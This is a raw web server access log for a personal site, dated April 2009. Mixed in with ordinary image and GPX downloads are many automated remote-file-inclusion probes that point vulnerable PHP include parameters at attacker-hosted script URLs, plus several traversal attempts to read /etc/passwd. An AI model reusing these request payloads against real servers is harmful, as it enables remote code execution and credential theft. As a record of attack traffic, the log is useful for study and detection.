198.82.185.86 - - [28/Apr/2009:10:27:36 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0139_0.jpg HTTP/1.1" 200 344118 "http://www.vfrdiscussion.com/forum/lofiversion/index.php/t36984.html" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.5) Gecko/2008120908 Red Hat/3.0.5-1.el5_2 Firefox/3.0.5" "dmulk.com"
217.172.186.250 - - [28/Apr/2009:10:27:59 -0700] "GET /logs/index.php?visualizar=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.172.186.250 - - [28/Apr/2009:10:27:59 -0700] "GET /logs/access_081101.log/index.php?visualizar=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.172.186.250 - - [28/Apr/2009:10:27:59 -0700] "GET /logs/access_090324.log/index.php?visualizar=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:10:28:07 -0700] "GET /logs/access_080313.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [28/Apr/2009:10:28:12 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
74.220.219.113 - - [28/Apr/2009:10:28:13 -0700] "GET /logs/access_080808.log//squirrelcart/cart_content.php?cart_isp_root=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
74.220.219.113 - - [28/Apr/2009:10:28:13 -0700] "GET /squirrelcart/cart_content.php?cart_isp_root=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:10:28:17 -0700] "GET /logs/access_080313.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.220.219.113 - - [28/Apr/2009:10:28:22 -0700] "GET /logs/access_080808.log//squirrelcart/cart_content.php?cart_isp_root=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
74.220.219.113 - - [28/Apr/2009:10:28:22 -0700] "GET /squirrelcart/cart_content.php?cart_isp_root=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
74.220.219.113 - - [28/Apr/2009:10:28:22 -0700] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
70.247.250.222 - - [28/Apr/2009:10:28:23 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.247.250.222 - - [28/Apr/2009:10:28:24 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.247.250.222 - - [28/Apr/2009:10:28:24 -0700] "GET /logs/access_081201.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.247.250.222 - - [28/Apr/2009:10:28:26 -0700] "GET /logs/access_090117.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [28/Apr/2009:10:28:26 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
217.172.186.250 - - [28/Apr/2009:10:28:51 -0700] "GET /index.php?visualizar=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 200 43287 "-" "Mozilla/5.0" "www.dmulk.com"
85.236.53.4 - - [28/Apr/2009:10:29:00 -0700] "GET /logs/access_080808.log//squirrelcart/cart_content.php?cart_isp_root=http://www.lyscanh1.xpg.com.br/idv6.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.236.53.4 - - [28/Apr/2009:10:29:00 -0700] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://www.lyscanh1.xpg.com.br/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.236.53.4 - - [28/Apr/2009:10:29:00 -0700] "GET /squirrelcart/cart_content.php?cart_isp_root=http://www.lyscanh1.xpg.com.br/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.236.53.4 - - [28/Apr/2009:10:29:02 -0700] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://www.lyscanh1.xpg.com.br/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.236.53.4 - - [28/Apr/2009:10:29:02 -0700] "GET /logs/access_080808.log//squirrelcart/cart_content.php?cart_isp_root=http://www.lyscanh1.xpg.com.br/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.236.53.4 - - [28/Apr/2009:10:29:02 -0700] "GET /squirrelcart/cart_content.php?cart_isp_root=http://www.lyscanh1.xpg.com.br/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.172.186.250 - - [28/Apr/2009:10:29:14 -0700] "GET /logs/access_081228.log%20%20/index.php?visualizar=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.172.186.250 - - [28/Apr/2009:10:29:14 -0700] "GET /logs/access_081101.log%20%20/index.php?visualizar=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.137.160.91 - - [28/Apr/2009:10:29:39 -0700] "GET /logs/access_081211.log/portal/portal.php?phpbb_root_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.137.160.91 - - [28/Apr/2009:10:29:39 -0700] "GET /logs/portal/portal.php?phpbb_root_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.137.160.91 - - [28/Apr/2009:10:29:39 -0700] "GET /logs/access_080413.log/portal/portal.php?phpbb_root_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.137.160.91 - - [28/Apr/2009:10:29:39 -0700] "GET /portal/portal.php?phpbb_root_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.137.160.91 - - [28/Apr/2009:10:29:42 -0700] "GET /portal/portal.php?phpbb_root_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.137.160.91 - - [28/Apr/2009:10:29:42 -0700] "GET /logs/access_080413.log/portal/portal.php?phpbb_root_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.137.160.91 - - [28/Apr/2009:10:29:42 -0700] "GET /logs/portal/portal.php?phpbb_root_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.137.160.91 - - [28/Apr/2009:10:29:42 -0700] "GET /logs/access_081211.log/portal/portal.php?phpbb_root_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.236.53.4 - - [28/Apr/2009:10:29:44 -0700] "GET /logs/access_080514.log//squirrelcart/cart_content.php?cart_isp_root=http://www.lyscanh1.xpg.com.br/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.236.53.4 - - [28/Apr/2009:10:29:47 -0700] "GET /logs/access_080514.log//squirrelcart/cart_content.php?cart_isp_root=http://www.lyscanh1.xpg.com.br/idv6.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
162.42.201.180 - - [28/Apr/2009:10:29:55 -0700] "GET /logs/access_081011.log///?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
162.42.201.180 - - [28/Apr/2009:10:29:55 -0700] "GET /logs/access_081030.log///?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [28/Apr/2009:10:30:25 -0700] "GET /logs/?_zb_path=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 200 97188 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [28/Apr/2009:10:30:29 -0700] "GET /logs/access_071217.log/?_zb_path=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.247.250.222 - - [28/Apr/2009:10:30:33 -0700] "GET /logs/index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.247.250.222 - - [28/Apr/2009:10:30:33 -0700] "GET /logs/access_080403.log/index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [28/Apr/2009:10:30:36 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.43 - - [28/Apr/2009:10:30:36 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.43 - - [28/Apr/2009:10:30:50 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
64.157.4.41 - - [28/Apr/2009:10:30:54 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
218.38.243.71 - - [28/Apr/2009:10:31:01 -0700] "GET /logs/access_071214.log//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.137.160.91 - - [28/Apr/2009:10:31:15 -0700] "GET /logs/access_080413.log%20%20/portal/portal.php?phpbb_root_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.137.160.91 - - [28/Apr/2009:10:31:15 -0700] "GET /logs/access_081211.log%20%20/portal/portal.php?phpbb_root_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [28/Apr/2009:10:31:18 -0700] "GET /?_zb_path=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 200 43302 "-" "Mozilla/5.0" "www.dmulk.com"
195.137.160.91 - - [28/Apr/2009:10:31:18 -0700] "GET /logs/access_080413.log%20%20/portal/portal.php?phpbb_root_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.137.160.91 - - [28/Apr/2009:10:31:18 -0700] "GET /logs/access_081211.log%20%20/portal/portal.php?phpbb_root_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.103.16.43 - - [28/Apr/2009:10:31:19 -0700] "GET /logs/access_080808.log//squirrelcart/cart_content.php?cart_isp_root=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
70.247.250.222 - - [28/Apr/2009:10:31:19 -0700] "GET /index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 200 43423 "-" "Mozilla/5.0" "www.dmulk.com"
200.103.16.43 - - [28/Apr/2009:10:31:19 -0700] "GET /squirrelcart/cart_content.php?cart_isp_root=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
200.103.16.43 - - [28/Apr/2009:10:32:00 -0700] "GET /logs/access_080808.log//squirrelcart/cart_content.php?cart_isp_root=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.103.16.43 - - [28/Apr/2009:10:32:00 -0700] "GET /squirrelcart/cart_content.php?cart_isp_root=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.103.16.43 - - [28/Apr/2009:10:32:01 -0700] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.220.219.113 - - [28/Apr/2009:10:32:09 -0700] "GET /squirrelcart/cart_content.php?cart_isp_root=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
218.27.203.107 - - [28/Apr/2009:10:32:10 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://kcaer.re.kr/zboard/icon/klebuix/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [28/Apr/2009:10:32:10 -0700] "GET /logs/access_081027.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://kcaer.re.kr/zboard/icon/klebuix/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [28/Apr/2009:10:32:10 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://kcaer.re.kr/zboard/icon/klebuix/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.30.81.189 - - [28/Apr/2009:10:32:10 -0700] "GET /bikes/dteel/2008_09_13/?N=D HTTP/1.0" 200 1678 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
218.27.203.107 - - [28/Apr/2009:10:32:37 -0700] "GET /logs/access_081107.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://kcaer.re.kr/zboard/icon/klebuix/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.172.186.250 - - [28/Apr/2009:10:32:37 -0700] "GET /logs/access_081228.log/index.php?visualizar=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.247.250.222 - - [28/Apr/2009:10:32:43 -0700] "GET /logs/access_081201.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.247.250.222 - - [28/Apr/2009:10:32:44 -0700] "GET /logs/access_090117.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
198.22.131.50 - - [28/Apr/2009:10:33:27 -0700] "GET /bikes/dteel/2009_03_29/IMG_6022s.JPG HTTP/1.1" 200 0 "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
85.236.53.4 - - [28/Apr/2009:10:33:38 -0700] "GET /logs/access_080514.log%20//squirrelcart/cart_content.php?cart_isp_root=http://www.lyscanh1.xpg.com.br/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.236.53.4 - - [28/Apr/2009:10:33:51 -0700] "GET /logs/access_080514.log%20//squirrelcart/cart_content.php?cart_isp_root=http://www.lyscanh1.xpg.com.br/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.118.82.22 - - [28/Apr/2009:10:34:04 -0700] "GET /logs/access_080818.log/index.php?pagina=http://girlsex-total.com/bot/page.restrictor.log?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.157.4.41 - - [28/Apr/2009:10:34:05 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.118.82.22 - - [28/Apr/2009:10:34:16 -0700] "GET /logs/access_080131.log/index.php?pagina=http://girlsex-total.com/bot/page.restrictor.log?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.157.4.41 - - [28/Apr/2009:10:34:20 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
64.118.82.22 - - [28/Apr/2009:10:34:23 -0700] "GET /logs/access_080818.log/index.php?pagina=http://girlsex-total.com/bot/page.restrictor.log?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.157.4.41 - - [28/Apr/2009:10:34:24 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.118.82.22 - - [28/Apr/2009:10:34:28 -0700] "GET /logs/index.php?pagina=http://girlsex-total.com/bot/page.restrictor.log?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.118.82.22 - - [28/Apr/2009:10:34:37 -0700] "GET /logs/access_080131.log/index.php?pagina=http://girlsex-total.com/bot/page.restrictor.log?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.157.4.41 - - [28/Apr/2009:10:34:48 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
64.118.82.22 - - [28/Apr/2009:10:34:59 -0700] "GET /index.php?pagina=http://girlsex-total.com/bot/page.restrictor.log?? HTTP/1.1" 200 43313 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
74.220.219.113 - - [28/Apr/2009:10:35:08 -0700] "GET /logs/access_080514.log//squirrelcart/cart_content.php?cart_isp_root=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
64.118.82.22 - - [28/Apr/2009:10:35:17 -0700] "GET /index.php?pagina=http://girlsex-total.com/bot/page.restrictor.log?? HTTP/1.1" 200 43313 "-" "libwww-perl/5.810" "www.dmulk.com"
92.75.152.97 - - [28/Apr/2009:10:35:19 -0700] "GET /xbbknnaalaaammdgm.php HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)" "www.dmulk.com"
62.123.237.124 - - [28/Apr/2009:10:35:22 -0700] "GET /squirrelcart/cart_content.php?cart_isp_root=http://www.lyscanh1.xpg.com.br/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.123.237.124 - - [28/Apr/2009:10:35:23 -0700] "GET /logs/access_080514.log%20//squirrelcart/cart_content.php?cart_isp_root=http://www.lyscanh1.xpg.com.br/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.123.237.124 - - [28/Apr/2009:10:35:23 -0700] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://www.lyscanh1.xpg.com.br/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.147.29.190 - - [28/Apr/2009:10:35:48 -0700] "GET /logs/access_090312.log//accounts.php?command=http://olesya.biz/aJz.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.123.237.124 - - [28/Apr/2009:10:36:31 -0700] "GET /logs/access_080808.log//squirrelcart/cart_content.php?cart_isp_root=http://www.lyscanh1.xpg.com.br/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.147.29.190 - - [28/Apr/2009:10:36:36 -0700] "GET /logs/access_081224.log//accounts.php?command=http://olesya.biz/aJz.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.198.63.61 - - [28/Apr/2009:10:36:47 -0700] "GET /logs/access_080726.log/index.php?ort=../../../../../../../../../../../../../etc/passwd%00? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.198.63.61 - - [28/Apr/2009:10:36:47 -0700] "GET /logs/index.php?ort=../../../../../../../../../../../../../etc/passwd%00? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [28/Apr/2009:10:36:49 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
213.198.63.61 - - [28/Apr/2009:10:36:52 -0700] "GET /logs/access_081215.log/index.php?ort=../../../../../../../../../../../../../etc/passwd%00? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [28/Apr/2009:10:37:04 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
194.213.194.14 - - [28/Apr/2009:10:37:32 -0700] "GET /logs/index.php?lg=../../../../../../../../../../../../../etc/passwd%00? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.213.194.14 - - [28/Apr/2009:10:37:32 -0700] "GET /logs/access_081012.log/index.php?lg=../../../../../../../../../../../../../etc/passwd%00? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.198.63.61 - - [28/Apr/2009:10:37:33 -0700] "GET /index.php?ort=../../../../../../../../../../../../../etc/passwd%00? HTTP/1.1" 200 43345 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [28/Apr/2009:10:37:43 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.41 - - [28/Apr/2009:10:37:57 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
77.232.68.137 - - [28/Apr/2009:10:38:05 -0700] "GET /logs/access_081122.log//inc/header.php/step_one.php?server_inc=http://http://ddwvideo.dd.funpic.org/osy2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.232.68.137 - - [28/Apr/2009:10:38:05 -0700] "GET /inc/header.php/step_one.php?server_inc=http://http://ddwvideo.dd.funpic.org/osy2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.232.68.137 - - [28/Apr/2009:10:38:05 -0700] "GET /logs//inc/header.php/step_one.php?server_inc=http://http://ddwvideo.dd.funpic.org/osy2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.232.68.137 - - [28/Apr/2009:10:38:06 -0700] "GET /logs/access_090322.log//inc/header.php/step_one.php?server_inc=http://http://ddwvideo.dd.funpic.org/osy2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.123.237.124 - - [28/Apr/2009:10:38:13 -0700] "GET /logs/access_080514.log//squirrelcart/cart_content.php?cart_isp_root=http://www.lyscanh1.xpg.com.br/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.213.194.14 - - [28/Apr/2009:10:38:22 -0700] "GET /index.php?lg=../../../../../../../../../../../../../etc/passwd%00? HTTP/1.1" 200 43343 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.89.68 - - [28/Apr/2009:10:38:31 -0700] "GET /logs/access_080829.log/_blogadata/include/struct_main.php?incl_page=http://jeta.co.kr//bbs/component/.jpg/kantap.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.89.68 - - [28/Apr/2009:10:38:31 -0700] "GET /logs/_blogadata/include/struct_main.php?incl_page=http://jeta.co.kr//bbs/component/.jpg/kantap.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.89.68 - - [28/Apr/2009:10:38:31 -0700] "GET /_blogadata/include/struct_main.php?incl_page=http://jeta.co.kr//bbs/component/.jpg/kantap.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.89.68 - - [28/Apr/2009:10:38:31 -0700] "GET /logs/access_081130.log/_blogadata/include/struct_main.php?incl_page=http://jeta.co.kr//bbs/component/.jpg/kantap.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.213.194.14 - - [28/Apr/2009:10:38:41 -0700] "GET /logs/access_081012.log%20%20/index.php?lg=../../../../../../../../../../../../../etc/passwd%00? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.89.68 - - [28/Apr/2009:10:38:42 -0700] "GET /logs/access_080829.log/_blogadata/include/struct_main.php?incl_page=http://jeta.co.kr//bbs/component/.jpg/kantap.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.89.68 - - [28/Apr/2009:10:38:43 -0700] "GET /logs/access_081130.log/_blogadata/include/struct_main.php?incl_page=http://jeta.co.kr//bbs/component/.jpg/kantap.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.89.68 - - [28/Apr/2009:10:38:43 -0700] "GET /logs/_blogadata/include/struct_main.php?incl_page=http://jeta.co.kr//bbs/component/.jpg/kantap.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.89.68 - - [28/Apr/2009:10:38:43 -0700] "GET /_blogadata/include/struct_main.php?incl_page=http://jeta.co.kr//bbs/component/.jpg/kantap.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.232.68.137 - - [28/Apr/2009:10:39:05 -0700] "GET /logs/access_081122.log//inc/header.php/step_one.php?server_inc=http://ddwvideo.dd.funpic.org/osy2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.232.68.137 - - [28/Apr/2009:10:39:05 -0700] "GET /logs//inc/header.php/step_one.php?server_inc=http://ddwvideo.dd.funpic.org/osy2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.232.68.137 - - [28/Apr/2009:10:39:05 -0700] "GET /inc/header.php/step_one.php?server_inc=http://ddwvideo.dd.funpic.org/osy2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.232.68.137 - - [28/Apr/2009:10:39:06 -0700] "GET /logs/access_090322.log//inc/header.php/step_one.php?server_inc=http://ddwvideo.dd.funpic.org/osy2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.147.29.190 - - [28/Apr/2009:10:39:17 -0700] "GET /logs/access_080211.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://olesya.biz/aJz.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.147.29.190 - - [28/Apr/2009:10:39:17 -0700] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://olesya.biz/aJz.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.89.68 - - [28/Apr/2009:10:39:19 -0700] "GET /logs/access_080829.log%20%20/_blogadata/include/struct_main.php?incl_page=http://jeta.co.kr//bbs/component/.jpg/kantap.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.89.68 - - [28/Apr/2009:10:39:19 -0700] "GET /logs/_blogadata/include/struct_main.php?incl_page=http://jeta.co.kr//bbs/component/.jpg/kantap.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.89.68 - - [28/Apr/2009:10:39:19 -0700] "GET /_blogadata/include/struct_main.php?incl_page=http://jeta.co.kr//bbs/component/.jpg/kantap.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
